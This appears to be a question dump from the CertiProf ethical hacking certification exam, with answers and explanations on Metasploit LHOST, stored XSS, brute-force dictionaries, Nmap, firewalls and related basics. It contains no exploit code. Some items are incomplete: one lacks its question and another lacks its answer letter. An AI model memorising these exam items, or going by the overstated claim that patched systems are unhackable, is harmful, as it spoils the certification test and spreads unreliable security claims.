CertiProf CEHPC - Ethical Hacking Professional Certification Exam
What is the Lhost in metasploit?
Local host.
Host line.
Local hosting.
The Answer Is:
AExplanation:
In the Metasploit Framework, LHOST stands forLocal Host. This is a critical configuration variable that specifies the IP address of the attacker's (tester's) machine. When an ethical hacker deploys an exploit—particularly one that utilizes areverse shell—the LHOST tells the victim's machine exactly where to send the connection back to.
Setting the LHOST correctly is vital for the success of an exploitation attempt. In most network environments, especially those involving NAT (Network Address Translation) or VPNs, the tester must ensure they use the IP address that is reachable by the target system. For instance, if the tester is on a local network, they would use their internal IP; however, if they are testing over a wider network or the internet, they must ensure the LHOST points to a public IP or a listener configured to handle the traffic.
Along with LPORT (Local Port), LHOST defines the listener on the attacker's machine. When the exploit executes on the target (RHOST), the payload initiates a connection back to the address defined in LHOST. If this variable is misconfigured, the exploit might successfully run on the victim's end, but the tester will never receive the shell, resulting in a failed attempt. For an ethical hacker, double-checking the LHOST and LPORT settings is a standard "best practice" before launching any module to ensure a stable and reliable connection is established.
Can all computers be hacked?
Yes, all computer equipment can be hacked without any complications. B. Yes, all are hackable. C. No, only those that are not updated by security patches, both operating system and programs and exposed ports.
The Answer Is:
Explanation:
A common misconception in cybersecurity is that every single computer system is inherently vulnerable to a breach at any given moment. However, from an ethical hacking and defensive standpoint, a computer is only "hackable" if it presents an exploitable vulnerability. A system that is fully patched, correctly configured, and isolated from unnecessary network exposure is significantly harder to compromise, often to the point where an attack is no longer viable for a standard threat actor.
Vulnerabilities typically arise from three main areas: unpatched software, misconfigurations, and human error. Security patches are updates issued by vendors to fix known vulnerabilities in the operating system or applications. If an administrator applies these patches promptly, they close the "windows of opportunity" that hackers use to gain entry. Furthermore, "exposed ports" refer to network entry points that are left open and listening for connections. A secure system follows the principle of "Least Functionality," meaning only essential ports and services are active, thereby reducing the "attack surface."
The statement that all computers are hackable "without any complications" is incorrect because security is a layered discipline. While a persistent and highly funded state-sponsored actor might eventually find a "Zero-Day" vulnerability (a flaw unknown to the vendor), the vast majority of systems remain secure as long as they adhere to rigorous maintenance schedules. Defensive strategies focus on "Hardening," which involves removing unnecessary software, disabling unused services, and implementing strong authentication. Therefore, a computer that is meticulously updated and shielded by firewalls and intrusion prevention systems does not provide the necessary "foothold" for an attacker to exploit, effectively making it unhackable through known standard vectors. This highlights the importance of proactive management in mitigating attack vectors rather than assuming inevitable defeat.
The malicious code is permanently stored on the server.
The source code of the page, this can be html or javascript.
In this type of attack, the malicious code is sent to the web server via an HTTP request. The server then processes the request and returns a response that includes the malicious code.
The Answer Is:
AExplanation:
Persistent Cross-Site Scripting (XSS), also known as Stored XSS, is one of the most dangerous forms of web application vulnerabilities. It occurs when a web application receives data from a user and stores it permanently in its backend database or filesystem without proper sanitization or encoding. Common vectors for persistent XSS include comment sections, user profiles, message boards, and "Contact Us" forms. Unlike Reflected XSS, where the payload is included in a specific URL and only affects the user who clicks that link, a persistent XSS payload is served automatically to every user who visits the affected page.
When an attacker successfully injects a malicious script (typically JavaScript), the server "remembers" this script. Every time a legitimate user requests the page where the data is displayed, the server includes the malicious code in the HTML response. The user’s browser, trusting the source, executes the script. This can lead to devastating consequences, such as session hijacking through the theft of session cookies, account takeover, or the redirection of users to malicious websites. From an ethical hacking perspective, identifying persistent XSS involves testing all input fields that result in data being displayed later. Mitigation strategies focus on the principle of "filter input, escape output." Input should be validated against a strict whitelist of allowed characters, and any data rendered in the browser must be context-aware encoded (e.g., converting < to <) to prevent the browser from interpreting the data as executable code. Because the payload is stored on the server, this vulnerability represents a significant risk to the entire user base of an organization, making it a high-priority finding in any security assessment.
What is a dictionary used for brute-force attacks?
A common dictionary that contains words and their meanings.
A plain text document where passwords are usually stored.
A document containing a list of possible passwords that may successfully authenticate into a system.
The Answer Is:
CExplanation:
In ethical hacking and penetration testing, a dictionary used for brute-force or dictionary attacks is afile containing a list of potential passwordsthat an attacker or tester attempts against a target authentication mechanism. Therefore, option C is the correct answer.
Dictionary files are typically plain text documents that include commonly used passwords, leaked credentials, default passwords, variations of words, and patterns frequently chosen by users. Ethical hackers use these dictionaries duringpassword auditing and authentication testingto assess the strength of password policies implemented by an organization.
Option A is incorrect because a traditional language dictionary explains word meanings and is not structured for authentication testing. Option B is also incorrect because passwords are not normally stored in readable plain text documents; secure systems store passwords using hashing and salting mechanisms.
From a security perspective, dictionary attacks exploithuman behavior, particularly the tendency to choose weak or predictable passwords. Ethical hackers simulate these attacks in controlled environments to demonstrate the risks of poor password hygiene. The results help organizations enforce stronger password policies, multi-factor authentication, and account lockout mechanisms.
Understanding dictionary-based brute-force attacks is essential for managing attack vectors, as credential compromise remains one of the most common entry points for attackers. Ethical use of dictionaries allows organizations to proactively identify weaknesses before malicious actors exploit them.
What is malware?
Refers to any software specifically designed to protect, safeguard and store data on a device, network or system.
Refers to any software specifically designed to damage, infect, steal data or otherwise cause a nuisance to a device, network or computer system, without the owner's consent.
It is an Antivirus for servers especially.
The Answer Is:
BExplanation:
Malware, short for "malicious software," is a broad category of intrusive software developed by cybercriminals to compromise the confidentiality, integrity, or availability of a victim's data. It encompasses a wide variety of threats, including viruses, worms, Trojans, ransomware, and spyware. The defining characteristic of malware is that it is installed and executed on a system without the explicit consent or knowledge of the owner, with the primary intent of causing harm, stealing sensitive information, or gaining unauthorized access.
Managing malware as a security threat involves understanding its infection vectors and payload behaviors. Viruses attach themselves to legitimate files and spread through user interaction, while worms are self-replicating and spread across networks automatically by exploiting vulnerabilities. Trojans disguise themselves as useful programs to trick users into executing them, often opening "backdoors" for further exploitation. Ransomware, one of the most profitable forms of malware today, encrypts a user's files and demands payment for the decryption key.
Ethical hackers study malware to develop better detection signatures and behavioral analysis techniques. By analyzing how malware obfuscates its code or communicates with a Command and Control (C2) server, security professionals can implement better endpoint protection and network monitoring. Protecting against malware requires a multi-layered defense strategy, including up-to-date antivirus software, regular system patching, and user awareness training to prevent the execution of suspicious attachments or links. Understanding the diverse nature of malware is essential for any cybersecurity expert, as it remains the primary tool used by attackers to gain a foothold within targeted organizations.
What is a public IP?
Public IP addresses are assigned by Internet service providers.
It is the IP address assigned by the modem to the devices.
It is an IP that everyone uses.
The Answer Is:
AExplanation:
A public IP address is a fundamental element of the global internet infrastructure, serving as a unique identifier for a device or network gateway on the public web. These addresses are assigned by Internet Service Providers (ISPs) to their customers. Unlike private IP addresses, which are used for internal communication within a local network (like your home or office Wi-Fi), a public IP is globally unique and routable across the entire internet.
In the context of information security, the public IP represents the "front door" of an organization’s digital presence. It is the address that external servers, websites, and hackers see when a connection is made. For example, when an ethical hacker performs an "External Penetration Test," they are targeting the organization’s public IP to see what services (like web servers or VPN gateways) are exposed to the world.
Understanding the difference between a public IP and a private IP is crucial for managing security perimeters. While a modem or router might assign private IPs to internal devices (Option B), the router itself holds the public IP assigned by the ISP to communicate with the rest of the world. Protecting the public IP involve using firewalls and intrusion prevention systems to ensure that only legitimate traffic is allowed into the internal network. Because this address is visible to everyone, it is often the first point of contact for reconnaissance activities like port scanning or Google Dorking, making it a vital element to monitor and secure.
What is the results report document?
A document that lists tasks left unfinished due to time constraints.
A document that details findings, including identified vulnerabilities and exposed sensitive information.
A document used only to sign the agreement with the client.
The Answer Is:
BExplanation:
The results report document is acritical deliverablein the penetration testing process, making option B the correct answer. This document summarizes the findings of the engagement, including discovered vulnerabilities, exposed sensitive information, attack paths, and the potential impact on the organization.
A professional penetration testing report typically includes an executive summary, methodology, scope, risk ratings, technical details, evidence, and remediation recommendations. The goal is not just to list vulnerabilities but to help stakeholders understandrisk severity and business impact.
Option A is incorrect because incomplete work is usually addressed separately in project management documentation. Option C is incorrect because agreements and authorization documents are handled before testing begins, not in the results report.
From an ethical hacking standpoint, the results report supports transparency, accountability, and improvement. Ethical hackers must ensure findings are accurate, reproducible, and clearly explained. Poor reporting can reduce the value of an otherwise successful test.
The report also serves as a roadmap for remediation, allowing organizations to prioritize fixes, improve controls, and reduce future attack surfaces. High-quality reporting is a defining characteristic of professional ethical hacking.
What tool would you use to scan ports?
Metasploit
Nmap
Shodan
The Answer Is:
BExplanation:
Nmap is the primary tool used forport scanning, making option B the correct answer. Port scanning is a core activity during the reconnaissance and scanning phases of penetration testing, where the goal is to identify open, closed, or filtered ports on target systems.
Nmap allows ethical hackers to discover which services are running, their versions, and potential misconfigurations. It supports multiple scan types, including TCP SYN scans, UDP scans, and service detection scans, making it highly versatile and efficient.
Option A is incorrect because Metasploit is primarily an exploitation framework, not a dedicated port scanner. Option C is incorrect because Shodan is an internet-wide search engine, not a direct scanning tool used against specific targets.
Understanding port scanning is essential for identifying attack surfaces. Open ports often expose services that may contain vulnerabilities or misconfigurations. Ethical hackers use Nmap responsibly to map networks and guide further testing.
From a defensive perspective, regular port scanning helps organizations identify unnecessary services and enforce least-exposure principles. Nmap remains one of the most fundamental tools in ethical hacking and network security.
What is a Firewall?
It is a firewall that serves to protect the server.
It is a computer security measure designed to protect a network, computer system or device against external or internal threats by monitoring, controlling and filtering network traffic according to a set of predefined rules.
It is a protection system designed so that hackers cannot be discovered.
The Answer Is:
BExplanation:
A firewall is a fundamental network security component that acts as a barrier between a trusted internal network and an untrusted external network, such as the internet. Its primary function is to monitor, control, and filter incoming and outgoing network traffic based on a set of predefined security rules. By inspecting each packet of data, the firewall determines whether to allow it to pass through or to block it entirely, thereby preventing unauthorized access and malicious activity.
Firewalls can be implemented as either hardware or software, and they generally operate at different levels of the network stack:
Packet Filtering: The most basic form, which inspects packets based on source/destination IP addresses and ports.
Stateful Inspection: A more advanced method that tracks the state of active connections to ensure that incoming traffic is a legitimate response to an internal request.
Application Level (Proxy Firewalls): These inspect the actual content of the data (the payload) for specific applications, such as web traffic (HTTP) or email (SMTP), to identify sophisticated threats that simple packet filters might miss.
In the context of ethical hacking, firewalls are the "first line of defense". During a penetration test, a tester must identify the type of firewall in place and attempt to find "holes" or misconfigurations in its rule set. For example, a common goal is to find a port that the firewall accidentally left open, which can then be used to establish areverse shell. A properly configured firewall is essential for minimizing an organization's attack surface and protecting its servers and individuals from being compromised.
Besides Kali Linux, what other operating system is used for hacking?
Hannah Montana Linux.
Windows xp
Parrot OS.
The Answer Is:
CExplanation:
While Kali Linux is the most widely recognized platform for penetration testing, Parrot OS is a major contemporary security trend in the cybersecurity community. Parrot OS is a Debian-based distribution that, like Kali, comes pre-loaded with a vast array of tools for security auditing, digital forensics, and reverse engineering. It is frequently cited as a lighter, more user-friendly alternative that focuses heavily on privacy and anonymity, featuring built-in tools for routing traffic through the Tor network.
In the landscape of modern security trends, the choice of an operating system often depends on the specific requirements of the pentest. Parrot OS is designed to be highly portable and efficient on hardware with limited resources, making it a popular choice for "Security on the Go." It provides a "Home" edition for daily use and a "Security" edition tailored specifically for professional hackers. Other notable mentions in this category include BlackArch and BackBox, but Parrot OS remains one of the top contenders alongside Kali Linux for industry professionals.
Understanding these different platforms is crucial for an ethical hacker, as each offers different desktop environments and tool configurations. For example, while Kali is built for offensive operations, Parrot often places more emphasis on the developer's needs, including pre-installed compilers and IDEs alongside hacking tools. Using these specialized Linux distributions allows testers to work in a stable, standardized environment where tools are pre-configured to handle the complexities of network exploitation. By staying current with these trends, security professionals can ensure they are using the most efficient and up-to-date environments available to identify and mitigate vulnerabilities in increasingly complex digital infrastructures.
